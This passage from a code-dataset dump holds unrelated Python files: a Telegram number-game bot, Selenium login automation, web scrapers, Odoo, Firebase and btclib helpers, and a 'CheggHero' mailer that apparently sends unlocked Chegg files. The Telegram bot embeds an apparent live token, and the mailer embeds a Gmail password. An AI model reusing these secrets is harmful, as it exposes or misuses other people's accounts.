(create_response['meal']['id'])\n        expected = {\n            'meal': {\n                \"name\": self.data['name']\n            }\n        }\n        response = make_request(self.client, query, 'POST')\n        self.assertEqual(expected, response)\n        self.assertEqual({'meal': None}, self.retrieve_meal(create_response['meal']['id']))\n\n        # Delete with invalid id\n        query = '''\n            mutation{\n              deleteMeal(input: {id: \"%s\"}){\n                meal{\n                  name\n                }\n              }\n            }\n        ''' % (\"wrong-id\")\n        self.assertEqual({'meal': None}, make_request(self.client, query, 'POST'))\n","sub_path":"app/api/tests/test_meal_api.py","file_name":"test_meal_api.py","file_ext":"py","file_size_in_byte":4785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"408622532","text":"\r\nimport telebot\r\n\r\nfrom telebot import types\r\nfrom random import randint\r\n\r\ntoken = \"601141259:AAGHuH3ASwOyEryFKxqPQRUesjkivBINsOk\"\r\n\r\nbot = telebot.TeleBot(token)\r\n\r\n@bot.message_handler(commands=['start'])\r\ndef start_function(message):\r\n    chat_id = message.chat.id\r\n    user_markup = types.ReplyKeyboardMarkup(True, False)\r\n    user_markup.row('Start a game', 'Rules')\r\n    msg = bot.send_message(chat_id, \"Welcome to the 21 game, \" + message.chat.first_name + \"!\" , reply_markup=user_markup, parse_mode=\"Markdown\")\r\n    bot.register_next_step_handler(msg, main_menu)\r\n\r\ndef help_function(message):\r\n    chat_id = message.chat.id\r\n    user_markup = types.ReplyKeyboardMarkup(True, False)\r\n    user_markup.row('Back')\r\n    msg = bot.send_message(chat_id,\r\n                           \"The main goal of the game is to force your opponent to pick the number 21. You may only pick one of the three numbers that follow your opponent's number. \" +\r\n                           \"For example, if your opponent picked 4, you can continue by picking 5, 6 or 7. You may not take a number greater than 21. \" +\r\n                           \"Whoever picks 21 loses. Good luck!\",\r\n                           reply_markup=user_markup, parse_mode=\"Markdown\")\r\n    bot.register_next_step_handler(msg, start_function)\r\n\r\ndef ask_turn_def(message):\r\n    chat_id = message.chat.id\r\n    user_markup = types.ReplyKeyboardMarkup(True, False)\r\n    user_markup.row('Yes', 'No', 'Back')\r\n    msg = bot.send_message(chat_id, \"Do you want to start first?\", reply_markup=user_markup, parse_mode=\"Markdown\")\r\n    bot.register_next_step_handler(msg, turn_def)\r\n\r\ndef turn_def(message):\r\n    chat_id = message.chat.id\r\n    if message.text == \"Yes\":\r\n        bot.send_message(chat_id, \"Game has started! Your turn first\")\r\n        player_turn(message,0)\r\n    elif message.text == \"No\":\r\n        bot.send_message(chat_id, \"Game has started! My turn first\")\r\n        bot_turn(message)\r\n    else :\r\n        start_function(message)\r\n\r\ndef player_turn(msg,num):\r\n    chat_id = msg.chat.id\r\n    if num == 21:\r\n        end_game(msg,True)\r\n    else:\r\n        pl_markup = types.ReplyKeyboardMarkup(True, False)\r\n        b1 = str(num + 1)\r\n        b2 = str(num + 2)\r\n        b3 = str(num + 3)\r\n        if num == 19:\r\n            pl_markup.row(b1, b2)\r\n            pl_markup.row(\"Give up\")\r\n        elif num == 20:\r\n            pl_markup.row(b1)\r\n            pl_markup.row(\"Give up\")\r\n        else :\r\n            pl_markup.row(b1, b2, b3)\r\n            pl_markup.row(\"Give up\")\r\n        c_num = bot.send_message(chat_id, \"Choose a number\", reply_markup=pl_markup, parse_mode=\"Markdown\")\r\n        bot.register_next_step_handler(c_num, bot_turn)\r\n\r\ndef bot_turn(num):\r\n    chat_id = num.chat.id\r\n    if num.text == \"Give up\":\r\n        end_game(num,False)\r\n    elif num.text == \"21\":\r\n        end_game(num,False)\r\n    else:\r\n        if num.text == \"No\":\r\n            num.text = \"0\"\r\n        c_num = int(num.text)\r\n        if c_num == 0:\r\n            c_num = randint (1,3)\r\n        elif c_num < 4:\r\n            c_num = 4\r\n        elif c_num == 4:\r\n            c_num = randint(5,7)\r\n        elif c_num < 8:\r\n            c_num = 8\r\n        elif c_num == 8:\r\n            c_num = randint(9,11)\r\n        elif c_num < 12:\r\n            c_num = 12\r\n        elif c_num == 12:\r\n            c_num = randint(13,15)\r\n        elif c_num < 16:\r\n            c_num = 16\r\n        elif c_num == 16:\r\n            c_num = randint(17,19)\r\n        elif c_num < 20:\r\n            c_num = 20\r\n        elif c_num == 20:\r\n            c_num = 21\r\n        bot.send_message(chat_id, c_num)\r\n        player_turn(num,c_num)\r\n\r\ndef end_game(message,win):\r\n    chat_id = message.chat.id\r\n    if win == True:\r\n        bot.send_message(chat_id, \"Congrats!!! You won\")\r\n    else :\r\n        bot.send_message(chat_id, \"You lose. Better luck next time;)\")\r\n\r\n    markup = types.ReplyKeyboardMarkup(True, False)\r\n    markup.row('Main menu', 'Replay')\r\n    msg = bot.send_message(chat_id, \"What's next?\", reply_markup=markup, parse_mode=\"Markdown\")\r\n    bot.register_next_step_handler(msg, end_game_actions)\r\n\r\ndef end_game_actions(msg):\r\n    if(msg.text == \"Main menu\"):\r\n        start_function(msg)\r\n\r\n    else:\r\n        ask_turn_def(msg)\r\n\r\ndef main_menu(message):\r\n    chat_id = message.chat.id\r\n    bot.send_chat_action(chat_id,'typing')\r\n    if message.text == \"Start a game\":\r\n        ask_turn_def(message)\r\n    elif message.text == \"Rules\":\r\n        help_function(message)\r\n\r\n    else:\r\n        bot.send_message(chat_id, \"Unknown command. 
Please try again!\")\r\n start_function(message)\r\n #log(message, answer)\r\n\r\n\r\nif __name__ == '__main__':\r\n bot.polling(none_stop=True, interval=0)\r\n","sub_path":"my21game_bot.py","file_name":"my21game_bot.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"226319279","text":"\nfrom heuristic import Heuristic\nfrom state import State\nfrom planningProblem import PlanningProblem\n\nclass UnsatGoalsHeuristic(Heuristic):\n def heuristic(self, state, problem):\n # \"number of unsatisfied goals\" heuristic\n cost = 0\n\n # your code goes here\n goalState = problem.getGoal()\n currentState = State(list(state))\n \n # for literal in currentState.getLiterals():\n # if not goalState.containsLiteral(literal):\n # cost += 1\n \n currentState = State(list(state))\n for literal in goalState.getLiterals():\n if not currentState.isSatisfied(literal):\n cost += 1\n return cost\n","sub_path":"unsatgoalsheuristic.py","file_name":"unsatgoalsheuristic.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"474169419","text":"#It can be declared inside constructor and instance methods using self\n#It can be declared outside class using object reference\n\nclass Test:\n\tdef __init__(self):\n\t\tself.a=20 #declaring using constructor\n\n\tdef m1(self):\n\t\tself.b=30 #declaring using instance method\n\nt=Test()\nt.c=50 #declaring outside class\nprint(t.__dict__) #gives a dictionary with properties and their values as key-value pair\nt.m1() #when this method is invoked, b variable is declared \nprint(t.__dict__)","sub_path":"OOPS/Instance_Variable_Declaration.py","file_name":"Instance_Variable_Declaration.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"417204571","text":"import cv2\nimport matplotlib.pyplot as plt\n\nfrom src.filter_colors import FilterColors\n\nimg = cv2.imread('square1.jpg', 1)\nfc = FilterColors(img)\nidx = 1\nfor k in range(len(fc.rank_ranges)):\n img = fc.get_filtered_gray_image(k)\n plt.subplot(4, 4, idx)\n idx += 1\n plt.imshow(img, cmap='gray')\nplt.show()\n","sub_path":"try/colorRange1.py","file_name":"colorRange1.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"316257366","text":"from selenium import webdriver\nfrom bs4 import BeautifulSoup\nimport requests\nimport time\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\n\ndriver = webdriver.Chrome() # 打开 Chrome 浏览器\ndriver.get(\"https://event.beanfun.com/mabinogi/E20180517/index.aspx\") \n\n\ndriver.find_element_by_id(\"i12\").click()\n\ntry:\n \n iframe = WebDriverWait(driver, 10).until(\n EC.presence_of_element_located((By.ID,'ifmForm1'))\n )\n driver.switch_to.frame(iframe)\n driver.find_element_by_id(\"t_AccountID\").send_keys(\"\")\n driver.find_element_by_id(\"t_Password\").send_keys(\"\")\n driver.find_element_by_id(\"btn_login\").click()\n print (\"login success\")\nexcept TimeoutException:\n print('time out')\nfinally:\n print('finish')\n #選擇帳號\n\n\ntry:\n element = WebDriverWait(driver, 10).until(\n 
EC.presence_of_element_located((By.ID, \"ddl_service_account\"))\n )\n select = Select(driver.find_element_by_id('ddl_service_account'))\n select.select_by_index(1)\n driver.find_element_by_id(\"btn_send_service_account\").click()\nexcept TimeoutException:\n print('time out')\n\n#plant\ntime.sleep(5)\ndriver.get(\"https://event.beanfun.com/mabinogi/E20180517/Potted.aspx\")\ndriver.find_element_by_id(\"p02\").click()\n\n","sub_path":"sium/acivity13.py","file_name":"acivity13.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"202385773","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import http\nfrom odoo.http import request\nfrom odoo.addons.website_mail.controllers.main import WebsiteMail\n\n\nclass WebsiteMail(WebsiteMail):\n\n @http.route(['/website_mail/post/json'], type='json', auth='public', website=True)\n def chatter_json(self, res_model='', res_id=None, message='', **kw):\n \"\"\"get reviews from website products\"\"\"\n params = kw.copy()\n msg_data = super(WebsiteMail, self).chatter_json(\n res_model=res_model, res_id=res_id, message=message, **params)\n res_user = request.env['res.users'].search(\n [('name', '=', msg_data.get('author'))])\n product = request.env['product.template'].browse(res_id)\n rating = float(kw.get('rating')) if kw.get('rating') else 0\n # store data from website at product backend\n request.env['customer.review'].sudo().create({\n 'customer_id': res_user.id,\n 'name': message,\n 'date': msg_data.get('date'),\n 'email': res_user.partner_id.email,\n 'product_id': product.id,\n 'rating': rating,\n })\n return msg_data\n","sub_path":"product_rating_review/controllers/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"343427164","text":"import atexit\nimport signal,sys\nimport numpy as np\nfrom time import time,sleep\nfrom functools import partial\nfrom kusanagi.ghost.algorithms.PILCO import PILCO\nfrom kusanagi.shell.plant import SerialPlant, LivePlot\nfrom kusanagi.shell.cartpole import CartpoleDraw\nfrom kusanagi.ghost.control import RBFPolicy\nfrom kusanagi.utils import gTrig_np\n\nif __name__ == '__main__':\n #np.random.seed(31337)\n np.set_printoptions(linewidth=500)\n # initliaze plant\n dt = 0.1 # simulation time step\n model_parameters ={} # simulation parameters\n model_parameters['l'] = 0.5\n model_parameters['m'] = 0.5\n model_parameters['M'] = 0.5\n model_parameters['b'] = 0.1\n model_parameters['g'] = 9.82\n x0 = [0,0,0,0] # initial state mean\n S0 = np.eye(4)*(0.1**2) # initial state covariance\n maxU = [10]\n measurement_noise = np.diag(np.ones(len(x0))*0.01**2) # model measurement noise (randomizes the output of the plant)\n plant = SerialPlant(model_parameters,x0,S0,dt,measurement_noise,state_indices=[0,2,3,1],maxU=maxU,baud_rate=4000000,port='/dev/ttyACM0')\n plot = LivePlot(plant,0.001,H=5,angi=[0,3])\n draw_cp = CartpoleDraw(plant,0.001) # initializes visualization\n plot.start()\n draw_cp.start()\n \n atexit.register(plant.stop)\n atexit.register(plot.stop)\n atexit.register(draw_cp.stop)\n\n w = 2*np.pi*0.5;\n A = 10;\n plant.reset_state()\n while True:\n exec_time = time()\n #u_t = A*w*np.cos(w*(time()+0.5*dt))[None]\n u_t = A*np.cos(w*time())[None]\n #if u_t >= 0:\n # u_t[0] = A\n #else:\n # u_t[0] = -A\n plant.apply_control(u_t)\n plant.step()\n #print plant.get_plant_state()\n exec_time = time() - exec_time\n 
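# pace the loop: sleep only for whatever remains of the dt-second control\n        # period after this iteration's work\n        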
sleep(max(dt-exec_time,0))\n\n","sub_path":"test/test_serial_plant.py","file_name":"test_serial_plant.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"249709310","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom smtplib import SMTP_SSL\r\nfrom email.mime.multipart import MIMEMultipart \r\nfrom email.mime.text import MIMEText \r\nimport sys\r\nimport os\r\n\r\n\r\ndef send_mail(code, url, receiver, download_dir, filename):\r\n\r\n    host_server = 'smtp.gmail.com'\r\n    port = 465\r\n\r\n    sender = 'chegghero.service@gmail.com'\r\n    pwd = 'Unlock2018'\r\n    \r\n    subject = 'CheggHero Unlock File! (NO REPLY)' # email subject\r\n\r\n    # message body text\r\n    text = '''\r\n    Dear!\r\n    \r\n    Here is the file you wanted. Thanks for coming!\r\n    '''\r\n    text = text + \"\\nYour activation code is: \" + code\r\n    text = text + \"\\nYour file URL is: \" + url\r\n\r\n    msg = MIMEMultipart('mixed') \r\n    text_plain = MIMEText(text, 'plain', 'utf-8')\r\n    msg.attach(text_plain) \r\n\r\n    # build the attachment\r\n    full_dir = os.path.join(download_dir, filename)\r\n    file_contend = open(full_dir, 'rb').read()\r\n    text_att = MIMEText(file_contend, 'base64', 'utf-8')\r\n    text_att[\"Content-Type\"] = 'application/octet-stream' \r\n    # the attachment below could be renamed to aaa.txt\r\n    # text_att[\"Content-Disposition\"] = 'attachment; filename=\"aaa.txt\"'\r\n    # an alternative way to set the header\r\n    text_att.add_header('Content-Disposition', 'attachment', filename=filename)\r\n    # the Chinese-filename variant below does not work\r\n    # text_att[\"Content-Disposition\"] = u'attachment; filename=\"中文附件.txt\"'.decode('utf-8')\r\n    msg.attach(text_att) \r\n    \r\n    msg['Subject'] = subject\r\n    msg[\"From\"] = sender # sender's email address\r\n    msg[\"To\"] = receiver # recipient's email address\r\n\r\n    smtp = SMTP_SSL(host_server, port) # SSL-encrypted connection\r\n    # smtp.set_debuglevel(0) # set_debuglevel() is for debugging: 1 enables debug mode, 0 disables it\r\n    smtp.ehlo(host_server) # connect to the server\r\n    smtp.login(sender, pwd) # log in to the mailbox\r\n    \r\n    try:\r\n        smtp.sendmail(sender, receiver, msg.as_string()) # send the email\r\n        print(\"Successfully Send to \" + receiver) # print a success marker\r\n        smtp.quit()\r\n        return True\r\n    except Exception as e:\r\n        print(e)\r\n        print(\"The server is busy, please continue later.\")\r\n        smtp.quit()\r\n        return False\r\n\r\n\r\ndef main(code, url, receiver):\r\n    try:\r\n        work_dir = os.getcwd()\r\n        download_dir = os.path.join(work_dir, \"download_file\", code)\r\n        filelist = os.listdir(download_dir)\r\n\r\n        if not filelist:\r\n            return False\r\n\r\n        filename = filelist[0]\r\n        return send_mail(code, url, receiver, download_dir, filename) # send the email\r\n        # sys.exit(0)\r\n    except Exception as e:\r\n        print(e)\r\n        print(\"Auto email failed\")\r\n        return False","sub_path":"CheggHero/unlock/Autoemail.py","file_name":"Autoemail.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"170110190","text":"import re\nimport os\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.support.ui import WebDriverWait\t\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.common.exceptions import StaleElementReferenceException\nfrom selenium.common.exceptions import NoSuchElementException\nimport json\nimport pandas as pd\nimport datetime\n\nfrom urllib.request import urlretrieve\n\ndef scrape_site(start_url):\n\tbrowser = webdriver.Firefox()\n\tbrowser.get(start_url)\n\ndef 
scrape_page(url):\n\n\t# Load page, click 'load more', reload page, until 'load more' isn't clickable\n\t# Can also try loading with page = 20\n\t# Get Items By XPath\n\n\tbrowser = webdriver.Firefox()\n\tbrowser.get(url)\n\n\tbrowser.wait = WebDriverWait(browser, 15)\n\telement = browser.wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'product-info')))\n\n\ttotal_items_str = browser.find_element_by_xpath('/html/body/div[5]/div/div[3]/div/div[3]/div[2]/div[2]/div[2]/div').text\n\n\ttotal_items = int(total_items_str[0:3])\n\n\ttitles = []\n\tprices = []\n\turls = []\n\timage_urls = []\n\timage_refs = []\n\n\tdef title_counter(num):\n\t\tif(num>1):\n\t\t\treturn('['+str(num)+']')\n\t\telse:\n\t\t\treturn(\"\")\n\n\tdef item_counter(num):\n\t\tif(num%60)==0:\n\t\t\treturn(1)\n\t\telse:\n\t\t\treturn num%60\n\n\timg_path = 'C:/Users/J/MatchMyLook/Image_Files/Women/Tops/handm'\n\tbase_xpath = '/html/body/div[5]/div/div[3]/div/div[3]/div[2]/div[3]/'\n\n\tbrowser.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n\n\tfor i in range(1,(total_items+1)):\n\n\t\titem_cter = item_counter(i)\n\t\tpg_cter = int(i/60)+1\n\t\ttitle_ctr = title_counter(pg_cter)\n\n\t\ttitle = browser.find_element_by_xpath(base_xpath+'div'+title_ctr+'/div['+str(item_cter)+']/div/div[2]/div[1]').text\n\t\ttitles.append(title)\n\t\tprice = browser.find_element_by_xpath(base_xpath+'div['+str(pg_cter)+']/div['+str(item_cter)+']/div/div[2]/div[2]/span').text\n\t\tprices.append(price)\n\t\turl = browser.find_element_by_xpath(base_xpath+'div['+str(pg_cter)+']/div['+str(item_cter)+']/div/a').get_attribute('href')\n\t\turls.append(url)\n\t\timg_url = browser.find_element_by_xpath(base_xpath+'div['+str(pg_cter)+']/div['+str(item_cter)+']/div/div[1]/img[1]').get_attribute('data-src')\n\t\timg_url = img_url.replace(\" \",\"%20\")\n\t\timg_url = \"http:\"+img_url.replace(\"amp;\",\"\")\n\t\timage_urls.append(img_url)\n\t\turlretrieve(img_url, os.path.join(img_path, str(i)+'.jpg'))\n\t\timage_refs.append( os.path.join(img_path, str(i)+'.jpg'))\n\n\treturn_df = pd.DataFrame({\n\t\t'Title':titles,\n\t\t'Price':prices,\n\t\t'Url':urls,\n\t\t'Image_Path':image_refs,},\n\t\t)\n\n\treturn return_df\n\nreturn_df = scrape_page('http://www.hm.com/us/products/ladies/tops?page=22')\nreturn_df.to_csv(\"C:/Users/J/MatchMyLook/Scraping/Data/h_and_m_womens_tops.csv\")","sub_path":"H_and_M/selenium_scraper_h_and_m.py","file_name":"selenium_scraper_h_and_m.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"474546713","text":"#!/usr/bin/env python3\n\n\"\"\"\nPython 3\n Using output from instrument_to_dict.py\n Combine to ESRC format\n\"\"\"\nimport colectica\nimport api\nimport pandas as pd\nimport os\nimport numpy as np\nfrom pandas.io.json import json_normalize\nimport json\n\n\ndef root_to_dict_interviewer_instruction(root):\n \"\"\"\n Part of parse xml, item_type = Interviewer Instruction\n \"\"\"\n info = {}\n info['URN'] = root.find('.//URN').text\n info['UserID'] = root.find('.//UserID').text\n info['InstructionText'] = root.find('.//InstructionText/LiteralText/Text').text\n return info\n\n\ndef item_to_dict(dict_item):\n \"\"\"\n Flat out item in dict_item\n \"\"\"\n info = {}\n item_info = None\n\n for k, v in dict_item.items():\n if k == 'ItemType':\n info[k] = api.item_dict_inv[dict_item['ItemType']]\n elif k == 'Item':\n item_info = colectica.parse_xml(v, api.item_dict_inv[dict_item['ItemType']])\n else:\n info[k] = 
v\n d = {**info, **item_info}\n return d\n\n\ndef generate_category_dict(category_file):\n \"\"\"\n Generate a dictionary for code category\n \"\"\"\n L = json.load(open(category_file))\n d = {}\n for dict_item in L:\n item = item_to_dict(dict_item)\n if not item['Label'] is None:\n d[item['URN']] = item['Label']\n else:\n d[item['URN']] = ''\n return d\n\n\ndef get_one_study(study_dir):\n \"\"\"\n output for one study\n \"\"\"\n df_columns = ['item_type', 'item_urn', 'content']\n df = pd.DataFrame(columns=df_columns)\n\n # category urn and label\n list_files = os.listdir(study_dir)\n\n instrument_dict = {}\n if 'Instrument.txt' in list_files:\n L = json.load(open(os.path.join(study_dir, 'Instrument.txt')))\n item = item_to_dict(L[0])\n instrument_dict['instrument_urn'] = item['InstrumentURN']\n instrument_dict['instrument_name'] = item['InstrumentName']\n\n if 'Category.txt' in list_files:\n category_dict = generate_category_dict(os.path.join(study_dir, 'Category.txt'))\n else:\n category_dict = []\n\n for input_file in list_files:\n\n filename = os.path.splitext(input_file)[0]\n\n L = json.load(open(os.path.join(study_dir, input_file)))\n\n if filename == 'Question':\n for dict_item in L:\n item = item_to_dict(dict_item)\n if not item['QuestionLiteral'] is None:\n literal = item['QuestionLiteral'].replace('\\n', '')\n else:\n literal = None\n df.loc[len(df)] = ['question', item['QuestionURN'], literal]\n df.loc[len(df)] = ['question name', None, item['QuestionItemName']]\n\n if item['Response'] != {} and item['Response']['response_type'] != 'CodeList':\n df.loc[len(df)] = [item['Response']['response_type'], None, item['Response']['response_label']]\n\n elif filename == 'Interviewer Instruction':\n for dict_item in L:\n item = item_to_dict(dict_item)\n df.loc[len(df)] = ['instruction', item['InstructionURN'], item['InstructionText']]\n\n elif filename == 'Code Set' and category_dict != []:\n for dict_item in L:\n item = item_to_dict(dict_item)\n for code in item['Code']:\n if code['Value'] is None:\n code['Value'] = ''\n cat_urn = 'urn:ddi:' + code['CategoryReference']['Agency'] + ':' + code['CategoryReference']['ID'] + ':' + code['CategoryReference']['Version']\n df.loc[len(df)] = ['codelist', code['URN'], code['Value'] + ', ' + category_dict[cat_urn]]\n\n elif filename == 'Statement':\n for dict_item in L:\n item = item_to_dict(dict_item)\n df.loc[len(df)] = ['statement', item['StatementURN'], item['Literal']]\n\n elif filename == 'Conditional':\n for dict_item in L:\n item = item_to_dict(dict_item)\n df.loc[len(df)] = ['conditional', item['URN'], item['IfCondition']['Description'] + item['IfCondition']['CommandContent'] if not item['IfCondition']['CommandContent'] is None else item['IfCondition']['Description']]\n\n elif filename == 'Loop':\n for dict_item in L:\n item = item_to_dict(dict_item)\n df.loc[len(df)] = ['loop', item['URN'], item['LoopWhile']['CommandContent']]\n\n else:\n # TODO\n print(filename)\n\n df = df.drop_duplicates(keep='first')\n df['instrument_name'] = instrument_dict['instrument_name']\n df['instrument_urn'] = instrument_dict['instrument_urn']\n return df\n\n\ndef main():\n top_dir = 'instrument_dict_original'\n dir_list = [os.path.join(top_dir, o) for o in os.listdir(top_dir) if os.path.isdir(os.path.join(top_dir,o))]\n\n appended_data = []\n for study_dir in dir_list:\n print(study_dir)\n df = get_one_study(study_dir)\n appended_data.append(df)\n\n df_all = pd.concat(appended_data)\n df_all.to_csv('ESRC.csv', sep='\\t', index=False)\n\nif __name__ == 
'__main__':\n main()\n","sub_path":"ESRC.py","file_name":"ESRC.py","file_ext":"py","file_size_in_byte":5134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"441585019","text":"import firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import firestore\n\n# Use a service account\ncred = credentials.Certificate('./config.json')\nfirebase_admin.initialize_app(cred)\n\ndb = firestore.client()\n\ndoc_ref = db.collection(u'ticketreader')\n\n\ndef newTicket(email, cost, flectura, fticket, IVA, NIF, company, wpage, number):\n # data structure for every ticket\n ticketData = {\n u'Correo': email,\n u'Coste': cost,\n u'Fecha Lectura': flectura,\n u'Fecha Ticket': fticket,\n u'IVA': IVA,\n u'NIF': NIF,\n u'Nombre de Empresa': company,\n u'Pagina Web': wpage,\n u'Telefono': number\n }\n\n #all_tickets = [doc.to_dict() for doc in doc_ref.stream()]\n\n doc_ref.add(ticketData)\n\n print(ticketData)\n\n\n\"\"\"\nnewTicket(\"Company D\", \"companyc@company.com\", \"40\", \"01/01/2021\", \"03/04/2020\",\n \"21\", \"ABC1234\", \"Company C\", \"companyc.com\", \"635112260\")\n\"\"\"\n","sub_path":"server/uploadToFirebase.py","file_name":"uploadToFirebase.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"546472386","text":"'''\nhttps://leetcode.com/problems/best-team-with-no-conflicts/\nYou are the manager of a basketball team. For the upcoming tournament, you want to choose the team with the highest overall score. The score of the team is the sum of scores of all the players in the team.\nHowever, the basketball team is not allowed to have conflicts. A conflict exists if a younger player has a strictly higher score than an older player. A conflict does not occur between players of the same age.\nGiven two lists, scores and ages, where each scores[i] and ages[i] represents the score and age of the ith player, respectively, return the highest overall score of all possible basketball teams.\nExample 1:\n\nInput: scores = [1,3,5,10,15], ages = [1,2,3,4,5]\nOutput: 34\nExplanation: You can choose all the players.\nExample 2:\n\nInput: scores = [4,5,6,5], ages = [2,1,2,1]\nOutput: 16\nExplanation: It is best to choose the last 3 players. Notice that you are allowed to choose multiple people of the same age.\nExample 3:\n\nInput: scores = [1,2,3,5], ages = [8,9,10,1]\nOutput: 6\nExplanation: It is best to choose the first 3 players. \n'''\n\n# sort based on age and if age is equal then sort their score\n# return max longest increasing subsequence sum from score array\nclass Solution:\n def bestTeamScore(self, scores: List[int], ages: List[int]):\n \n n = len(scores)\n \n score_arr = [s for a, s in sorted((age, score) for age, score in zip(ages, scores))]\n\n dp = score_arr[:]\n \n for i in range(1, n):\n for j in range(i):\n if score_arr[i] >= score_arr[j]:\n dp[i] = max(dp[i], dp[j] + score_arr[i])\n\n return max(dp)\n \n ","sub_path":"Dynamic Programming/best_team_with_no_conflict.py","file_name":"best_team_with_no_conflict.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"357633186","text":"#!/usr/bin/env python3\n\n# Copyright (C) 2017-2021 The btclib developers\n#\n# This file is part of btclib. 
It is subject to the license terms in the\n# LICENSE file found in the top-level directory of this distribution.\n#\n# No part of btclib including this file, may be copied, modified, propagated,\n# or distributed except according to the terms contained in the LICENSE file.\n\n\"\"\" Hash based helper functions.\n\n\"\"\"\n\nimport hashlib\nfrom typing import Callable, List, Tuple, Union\n\nfrom btclib.alias import HashF, Octets\nfrom btclib.ecc.curve import Curve, secp256k1\n\n# from btclib.to_pub_key import Key, pub_keyinfo_from_key\nfrom btclib.utils import bytes_from_octets, int_from_bits\n\nH160_Net = Tuple[bytes, str]\n\n\ndef ripemd160(octets: Octets) -> bytes:\n \"Return the RIPEMD160(*) of the input octet sequence.\"\n\n octets = bytes_from_octets(octets)\n return hashlib.new(\"ripemd160\", octets).digest()\n\n\ndef sha256(octets: Octets) -> bytes:\n \"Return the SHA256(*) of the input octet sequence.\"\n\n octets = bytes_from_octets(octets)\n return hashlib.sha256(octets).digest()\n\n\ndef hash160(octets: Octets) -> bytes:\n \"Return the HASH160=RIPEMD160(SHA256) of the input octet sequence.\"\n\n return ripemd160(sha256(octets))\n\n\ndef hash256(octets: Octets) -> bytes:\n \"Return the SHA256(SHA256(*)) of the input octet sequence.\"\n\n return sha256(sha256(octets))\n\n\ndef reduce_to_hlen(msg: Octets, hf: HashF = hashlib.sha256) -> bytes:\n\n msg = bytes_from_octets(msg)\n # Step 4 of SEC 1 v.2 section 4.1.3\n h = hf()\n h.update(msg)\n return h.digest()\n\n\ndef magic_message(msg: Octets) -> bytes:\n\n msg = bytes_from_octets(msg)\n t = (\n b\"\\x18Bitcoin Signed Message:\\n\"\n + len(msg).to_bytes(1, byteorder=\"big\", signed=False)\n + msg\n )\n return sha256(t)\n\n\n# FIXME move into ecc folder\ndef challenge_(\n msg_hash: Octets, ec: Curve = secp256k1, hf: HashF = hashlib.sha256\n) -> int:\n\n # the message msg_hash: a hf_len array\n hf_len = hf().digest_size\n msg_hash = bytes_from_octets(msg_hash, hf_len)\n\n # leftmost ec.nlen bits %= ec.n\n return int_from_bits(msg_hash, ec.nlen) % ec.n\n\n\ndef merkle_root(data: List[bytes], hf: Callable[[Union[bytes, str]], bytes]) -> bytes:\n \"\"\"Return the Merkel tree root of a list of binary hashes.\n\n The Merkel tree is a binary tree constructed\n with the provided list of binary data as bottom level,\n then recursively going up one level\n by hashing every hash value pair in the current level,\n until a single value (root) is obtained.\n \"\"\"\n\n data = [hf(item) for item in data]\n while len(data) != 1:\n parent_level = []\n if len(data) % 2:\n data.append(data[-1])\n for i in range(0, len(data), 2):\n parent = hf(data[i] + data[i + 1])\n parent_level.append(parent)\n data = parent_level[:]\n return data[0]\n\n\ndef tagged_hash(tag: bytes, m: bytes, hf: HashF = hashlib.sha256) -> bytes:\n\n h1 = hf()\n h1.update(tag)\n tag_hash = h1.digest()\n\n h2 = hf()\n h2.update(tag_hash + tag_hash)\n\n # it could be sped up by storing the above midstate\n\n h2.update(m)\n return h2.digest()\n","sub_path":"btclib/hashes.py","file_name":"hashes.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"511185973","text":"# from sklearn.feature_extraction.text import TfidfVectorizer\n# from nltk.stem.porter import PorterStemmer\n#\n#\n#\n#\n#\n# if __name__ == '__main__':\n# FILEPATH = '../data/raw.txt'\n# with open(FILEPATH) as f:\n# vizer = TfidfVectorizer(strip_accents='unicode', stop_words='english')\n# frequency_matrix = 
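The `merkle_root` helper in the hashes record above folds each level of hashes pairwise, duplicating the last node when a level has odd length. A standalone sketch using double SHA-256 in place of the generic `hf` parameter; the leaf bytes are illustrative and the list is assumed non-empty:

```python
import hashlib

def hash256(b: bytes) -> bytes:
    # Double SHA-256, mirroring the record's hash256 helper.
    return hashlib.sha256(hashlib.sha256(b).digest()).digest()

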